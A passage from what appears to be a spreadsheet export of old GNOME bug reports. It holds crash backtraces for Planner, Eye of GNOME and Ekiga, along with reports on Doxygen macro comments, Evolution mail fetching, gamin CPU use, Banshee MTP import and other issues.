#13 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#14 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#15 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#16 0xb7aee935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
#17 0xb7aef7a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
#18 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#19 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#20 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#21 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#22 0xb7918e9e in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#23 0xb7c9d787 in gtk_tool_button_new_from_stock ()
   from /usr/lib/libgtk-x11-2.0.so.0
#24 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#25 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#26 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#27 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#28 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#29 0xb7b00093 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
#30 0xb7b01cde in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#31 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#32 0xb7902fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#33 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#34 0xb791502a in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#35 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#36 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#37 0xb7b00123 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#38 0xb7b00181 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
#39 0xb7bcfb00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#40 0xb7902fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#41 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#42 0xb79151e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#43 0xb7915e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#44 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#45 0xb7ce35f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#46 0xb7bc8ef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#47 0xb7bca0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#48 0xb7a527ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#49 0xb7856802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#50 0xb78597df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#51 0xb7859b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#52 0xb7bca574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#53 0x080714ed in main ()
Thread 1 (Thread -1225713472 (LWP 9524)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb78c934b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7f3c1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7f87f20 in mrp_task_manager_calculate_task_work ()
   from /usr/lib/libplanner-1.so.0
No symbol table info available.
#5  0xb7f88f00 in mrp_task_manager_recalc () from /usr/lib/libplanner-1.so.0
No symbol table info available.
#6  0xb7f894b2 in mrp_task_manager_set_block_scheduling ()
   from /usr/lib/libplanner-1.so.0
No symbol table info available.
#7  0xb7f832cd in mrp_project_load () from /usr/lib/libplanner-1.so.0
No symbol table info available.
#8  0x080885ba in planner_window_open ()
No symbol table info available.
#9  0x080887b6 in planner_window_open_in_existing_or_new ()
No symbol table info available.
#10 0x08089fee in planner_window_new ()
No symbol table info available.
#11 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb7aee935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0xb7aef7a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0xb7918e9e in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#23 0xb7c9d787 in gtk_tool_button_new_from_stock ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0xb7914b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0xb7b00093 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0xb7b01cde in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0xb7911b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0xb7902fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0xb791502a in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0xb79160b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0xb7b00123 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0xb7b00181 in gtk_button_released () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0xb7bcfb00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0xb7902fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#41 0xb790479b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0xb79151e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#43 0xb7915e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#44 0xb7916279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#45 0xb7ce35f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#46 0xb7bc8ef3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0xb7bca0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#48 0xb7a527ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#49 0xb7856802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#50 0xb78597df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#51 0xb7859b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#52 0xb7bca574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#53 0x080714ed in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>pauledwards</t>
  </si>
  <si>
    <t>GNOMORADIO-56933</t>
  </si>
  <si>
    <t>druid needs Please wait while roboradio loads your songs page</t>
  </si>
  <si>
    <t>How do we implement this?</t>
  </si>
  <si>
    <t>F-SPOT-501023</t>
  </si>
  <si>
    <t>Files missing from POTFILES.in</t>
  </si>
  <si>
    <t>http://l10n.gnome.org/module/f-spot lists 6 files as missing form POTFILES.in. Please fix it.</t>
  </si>
  <si>
    <t>DOXYGEN-134288</t>
  </si>
  <si>
    <t>C comment preservation breaks existing documentation.</t>
  </si>
  <si>
    <t>This probably comes under the category of us relying on a feature which was
a bug.  If this is the case I'm happy to change although it will mean a
bit of work manually documenting stuff which was previously extracted for
us automatically.
In versions of DoxyGen prior to 1.3.6 (we use 1.3.5) it was possible to
embed DoxyGen commands as comments in macros and have them expand to
appropriate documentation with the macro arguments expanded.  In our
project we use a set of self documenting macros for pre-condition and
post-condition tests.  These macros are as follows:
#define GPE_PRECONDITION(expr)  \
    /** @pre expr */            \
    ((expr)? (void)0 : GPE_fatal(GPE_FatalCondition_Pre \
                                 #expr __FILE__ __LINE__))
#define GPE_POSTCONDITION(expr) \
    /** @pre expr */            \
    ((expr)? (void)0 : GPE_fatal(GPE_FatalCondition_Post \
                                 #expr __FILE__ __LINE__))
The embedded /** @pre expr */ comment was previously handled nicely by
DoxyGen resulting in the pre-condition with expr expanded being
generated in the documentation for the function.
An example of this usage is as follows:
The original source code with comment.
/**
 *  @brief  Check whether a task is running.
 *
 *  This function returns a value indicating whether a task is running.
 *
 *  @param  _this   A pointer to a GPE_Task instance.
 *
 *  @return     An @e int indicating whether the task is running.
 *  @retval 1   The task is running.
 *  @retval 0   The task is not running.
 */
GPE_API int
GPE_Task_running(const GPE_Task *_this)
{
    GPE_PRECONDITION(_this != NULL)
    return _this-&gt;running()
}
With DoxyGen 1.3.5 the documentation for this function (minus formatting)
was nice:
 int GPE_Task_running  (   const GPE_Task *    _this   ) 
Check whether a task is running.
This function returns a value indicating whether a task is running.
Parameters:
    _this  A pointer to a GPE_Task instance.
Returns:
    An int indicating whether the task is running.
Return values:
    1  The task is running.
    0  The task is not running.
Precondition:
    _this != NULL
NOW with 1.3.6 the pre-condition is no longer documented properly.  The
command embeded in the macro is not recognised and the macro argument is
not expanded.  Instead the text pre expr or post expr is simply
appended to the documentation for the function.
This is show below:
 int GPE_Task_running  (   const GPE_Task *    _this   ) 
Check whether a task is running.
This function returns a value indicating whether a task is running.
Parameters:
    _this  A pointer to a GPE_Task instance.
Returns:
    An int indicating whether the task is running.
Return values:
    1  The task is running.
    0  The task is not running.
pre expr</t>
  </si>
  <si>
    <t>colin.weaver</t>
  </si>
  <si>
    <t>GAMIN-161383</t>
  </si>
  <si>
    <t>gam_server excessive CPU usage</t>
  </si>
  <si>
    <t>Run gam_server under Mandrake linux cooker (as of 12/11/04) for a day or two.   
Run 'top' observe that gam_server is using most of the CPU (variable but  
sometime exceeding 98%.)  This is happening under the KDE 3.3.2 desktop. 
Binary packages installed:  
root@silicon root]# rpm -qa | grep gamin  
gamin-0.0.19-1mdk  
libgamin-1_0-0.0.19-1mdk  
libgamin-1_0-devel-0.0.19-1mdk</t>
  </si>
  <si>
    <t>jdyer</t>
  </si>
  <si>
    <t>GWGET-436322</t>
  </si>
  <si>
    <t>GWGET</t>
  </si>
  <si>
    <t>String in Spanish instead of English</t>
  </si>
  <si>
    <t>the string Ayuda (Ay_uda #6 in the pot file) is in Spanish instead of English as well as Archivo (_Archivo #44 in the pot file) Editar (_Editar #46 in the pot file) should be in English.
Other information:</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-548884</t>
  </si>
  <si>
    <t>User-defined functions do not work</t>
  </si>
  <si>
    <t>1. Open the gcalctool documentation look under To Use Functions.
2. Try to learn how to use user-defined functions
3. Fail
Yes this happens every time )
Here's the documentation of the syntax: Click on the Value field then enter the new value. Use the keyboard shortcuts to invoke a gcalctool button. For example enter 90K to calculate sine(90).
Aha just tried that with gcalctool 5.22.3 display says 0 I click Fun F0 and get Malformed function. :(
How do I write functions?  How do I write non-constant functions?  Which kinds of functions can be written?  How would I write the identity function?  How would I write Î»n.2n!?  How would I write Î»x.Î»y.log(y)/log(x)?  If I can't write non-constant functions why isn't this a part of the constants storage?
I think you should Click on the Documentation field then enter the new value )</t>
  </si>
  <si>
    <t>jonaskoelker</t>
  </si>
  <si>
    <t>EVOLUTION-223676</t>
  </si>
  <si>
    <t>fails to Fetch mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Blocker
Version: 1.0.3
Synopsis: fails to Fetch mail
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Evolution is failing to fetch mail from my local mailbox. When clicking
 I get an error box stating:
	Error while 'Fetching Mail':
	Cannot append message to
mbox://home/clambin/evolution/local/Inbox/mbox: sucess
Probably not related but I get the following error message when I start
Evolution:
evolution-shell-WARNING **: No folder metadata in
/home/clambin/evolution/local/Pan... ignoring
which seems related to a mail folder I deleted a few weeks ago.
</t>
  </si>
  <si>
    <t>clambin</t>
  </si>
  <si>
    <t>EVOLUTION-212224</t>
  </si>
  <si>
    <t>Calendar hotsync has issues</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: gnome-pilot-0.1.61-1 evolution-0.15.99-snap.ximian.200110050808
Synopsis: Calendar hotsync has issues
Bugzilla-Product: Evolution
Bugzilla-Component: Gnome-pilot &amp; pilot-link
Description:
The calendar hotsync conduit has issues:
1. All day events across multiple days show up on the Palm as a single-day event with a starting and ending time of 12 AM.
2. Updates do not show up in Evolution's calendar/contacts/todo list until Evolution is restarted.
3. My contacts list and calendar once both mysteriously went blank and were repopulated at the next hotsync with no data lost (like the multi-day events).
4. Events defined on the Palm disappear and reappear erratically.
All these problems seem to occur only when a hotsync is performed when Evolution is running. Coukd this be because of communication issues between the conduits and the respective Evolution components?
</t>
  </si>
  <si>
    <t>jace</t>
  </si>
  <si>
    <t>EKIGA-361680</t>
  </si>
  <si>
    <t>crash in Ekiga Softphone: Placing a call with ekig...</t>
  </si>
  <si>
    <t>Version: 2.0.3
What were you doing when the application crashed?
Placing a call with ekiga just after the connection is made it exists with error: Jitter thread did not terminate correclty.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/ekiga'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.</t>
  </si>
  <si>
    <t>beniwtv</t>
  </si>
  <si>
    <t>EOG-412380</t>
  </si>
  <si>
    <t>crash in Image Viewer: Opening a jpeg</t>
  </si>
  <si>
    <t>Version: 2.16.1
What were you doing when the application crashed?
Opening a jpeg
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 174141440 vsize: 174141440 resident: 37089280 share: 11542528 rss: 37089280 rss_rlim: -1
CPU usage: start_time: 1172519648 rtime: 113 utime: 106 stime: 7 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/eog'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 47336363990544 (LWP 5119)]
[New Thread 1090525520 (LWP 5121)]
[New Thread 1082132816 (LWP 5120)]
(no debugging symbols found)
0x00002b0d57535eef in waitpid () from /lib/libpthread.so.0
#0  0x00002b0d57535eef in waitpid () from /lib/libpthread.so.0
#1  0x00002b0d55ea3a07 in gnome_gtk_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#2  
#3  0x00002b0d56444c5b in gtk_gc_release () from /usr/lib/libgtk-x11-2.0.so.0
#4  0x00002b0d56fcca1d in g_hash_table_lookup ()
   from /usr/lib/libglib-2.0.so.0
#5  0x00002b0d56fc2fe6 in g_cache_remove () from /usr/lib/libglib-2.0.so.0
#6  0x00002b0d564f49c9 in gtk_style_attach ()
   from /usr/lib/libgtk-x11-2.0.so.0
#7  0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
#8  0x00002b0d56e85e58 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#9  0x00002b0d56e86e43 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
#10 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#11 0x00002b0d564ece62 in gtk_style_detach ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0x00002b0d5658a72f in gtk_widget_freeze_child_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
#13 0x000000000041b829 in eog_window_save_geometry ()
#14 0x00000000ffffffff in ?? ()
#15 0x00000000ffffffff in ?? ()
#16 0x00000000005a7430 in ?? ()
#17 0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
#18 0x00002b0d56e86023 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#19 0x00002b0d56e86e43 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
#20 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#21 0x00002b0d56586d4a in gtk_widget_unrealize ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0x00002b0d565875fd in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x00002b0d56e78640 in g_object_run_dispose ()
   from /usr/lib/libgobject-2.0.so.0
#24 0x00000000004153c2 in eog_window_close ()
#25 0x0000000000658010 in ?? ()
#26 0x0000000000415c2c in eog_window_has_contents ()
#27 0x00007fff5565ca90 in ?? ()
#28 0x00002b0d56483b5d in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
#30 0x00002b0d56e86023 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#31 0x00002b0d56e86c17 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
#32 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#33 0x00002b0d565809ae in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#34 0x00002b0d5647e344 in gtk_main_do_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
#35 0x00002b0d56821b0c in _gdk_events_init ()
   from /usr/lib/libgdk-x11-2.0.so.0
#36 0x00002b0d56fd8c84 in g_main_context_dispatch ()
   from /usr/lib/libglib-2.0.so.0
#37 0x00002b0d56fdbacd in g_main_context_check ()
   from /usr/lib/libglib-2.0.so.0
#38 0x00002b0d56fdbdda in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#39 0x00002b0d5647e5f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#40 0x000000000041ee7c in main ()
Thread 3 (Thread 1082132816 (LWP 5120)):
#0  0x00002b0d575328e6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#1  0x0000000000429031 in eog_job_manager_add ()
No symbol table info available.
#2  0x000000000054d5a8 in gdk_display ()
No symbol table info available.
#3  0x00000000005e4970 in ?? ()
No symbol table info available.
#4  0x00002b0d57531d10 in __pthread_mutex_unlock_usercnt ()
   from /lib/libpthread.so.0
No symbol table info available.
#5  0x00002b0d56ff4c04 in g_thread_create_full ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b0d5752f3ca in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x00002b0d5770c55d in clone () from /lib/libc.so.6
No symbol table info available.
#8  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 1090525520 (LWP 5121)):
#0  0x00002b0d575328e6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
No symbol table info available.
#1  0x0000000000429031 in eog_job_manager_add ()
No symbol table info available.
#2  0x000000000054d5a8 in gdk_display ()
No symbol table info available.
#3  0x0000000000a287b0 in ?? ()
No symbol table info available.
#4  0x00002b0d57531d10 in __pthread_mutex_unlock_usercnt ()
   from /lib/libpthread.so.0
No symbol table info available.
#5  0x00002b0d56ff4c04 in g_thread_create_full ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b0d5752f3ca in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#7  0x00002b0d5770c55d in clone () from /lib/libc.so.6
No symbol table info available.
#8  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 47336363990544 (LWP 5119)):
#0  0x00002b0d57535eef in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x00002b0d55ea3a07 in gnome_gtk_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x00002b0d56444c5b in gtk_gc_release () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#4  0x00002b0d56fcca1d in g_hash_table_lookup ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x00002b0d56fc2fe6 in g_cache_remove () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00002b0d564f49c9 in gtk_style_attach ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#7  0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x00002b0d56e85e58 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x00002b0d56e86e43 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0x00002b0d564ece62 in gtk_style_detach ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0x00002b0d5658a72f in gtk_widget_freeze_child_notify ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x000000000041b829 in eog_window_save_geometry ()
No symbol table info available.
#14 0x00000000ffffffff in ?? ()
No symbol table info available.
#15 0x00000000ffffffff in ?? ()
No symbol table info available.
#16 0x00000000005a7430 in ?? ()
No symbol table info available.
#17 0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x00002b0d56e86023 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x00002b0d56e86e43 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x00002b0d56586d4a in gtk_widget_unrealize ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x00002b0d565875fd in gtk_widget_hide () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x00002b0d56e78640 in g_object_run_dispose ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x00000000004153c2 in eog_window_close ()
No symbol table info available.
#25 0x0000000000658010 in ?? ()
No symbol table info available.
#26 0x0000000000415c2c in eog_window_has_contents ()
No symbol table info available.
#27 0x00007fff5565ca90 in ?? ()
No symbol table info available.
#28 0x00002b0d56483b5d in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x00002b0d56e7648a in g_closure_invoke ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x00002b0d56e86023 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x00002b0d56e86c17 in g_signal_emit_valist ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0x00002b0d56e87013 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x00002b0d565809ae in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#34 0x00002b0d5647e344 in gtk_main_do_event ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#35 0x00002b0d56821b0c in _gdk_events_init ()
   from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#36 0x00002b0d56fd8c84 in g_main_context_dispatch ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0x00002b0d56fdbacd in g_main_context_check ()
   from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#38 0x00002b0d56fdbdda in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#39 0x00002b0d5647e5f3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x000000000041ee7c in main ()
No symbol table info available.
#0  0x00002b0d57535eef in waitpid () from /lib/libpthread.so.0</t>
  </si>
  <si>
    <t>emprdalek1</t>
  </si>
  <si>
    <t>GNUMERIC-450676</t>
  </si>
  <si>
    <t>Crashed when trying to perform a t-test (any version) on Windows XP SP2</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Gnumeric version 1.7.10
2. sample data were columns A and B and each contained 5 values.
3. other more minor bugs: 1) graph of data does not appear 2) attempts at selecting vectors by point and click don't work and data locations must be typed into dialog boxes.
Stack trace:
Other information:</t>
  </si>
  <si>
    <t>g.m.feldman</t>
  </si>
  <si>
    <t>NAUTILUS-103214</t>
  </si>
  <si>
    <t>View as _Icons and View as _List shouldn't have mnemonics</t>
  </si>
  <si>
    <t>The string is used in many places. The mnemonics are just useful in the
view menu and in the mnemonic list at the right side of the location bar.
The attached screenshot illustrates some of the places where _List / _Icon
mnemonics are annoying. We should really put some effort into solving this
before 2.2.
regs
 Chris</t>
  </si>
  <si>
    <t>GLIB-151465</t>
  </si>
  <si>
    <t>get_filename_charset in gconvert.c is not public</t>
  </si>
  <si>
    <t>If you want to do a convertion like g_filename_from_utf8 but with fallback using
g_convert_with_fallback() you need the filename encoding there seem to be no
way to get it and be sure you will always get the same encoding than
g_filename_from_utf8 is using (sure you can copy get_filename_charset from
gconvert.c directly but this is not future proof).
The solution would be to put get_filename_charset public or to provide
g_filename_from_utf8_with_fallback.</t>
  </si>
  <si>
    <t>frenchfrog</t>
  </si>
  <si>
    <t>GEDIT-PLUGINS-335344</t>
  </si>
  <si>
    <t>The External Tools commands should run on remote hosts when applicable</t>
  </si>
  <si>
    <t>Please describe the problem:
When opening a file over ssh on a remote host the External Tools commands are
being run on the local host.
Steps to reproduce:
1. Open a file from a remote host using the gnome-vfs magic
2. Run a command (ex 'hostname &amp;&amp; pwd')
Actual results:
The command is run on the local host
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>BANSHEE-426379</t>
  </si>
  <si>
    <t>Device - MTP</t>
  </si>
  <si>
    <t>Banshee crashes on importing tracks from MTP device</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Launch banshee
2. Plug in MTP device (mine is a creative zen micro)
3. select Import Creative Zen Micro
Stack trace:
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
(Banshee:3880): GdkPixbuf-WARNING **: GdkPixbufLoader finalized without calling gdk_pixbuf_loader_close() - this is not allowed. You must explicitly end the data stream to the loader before dropping the last reference.
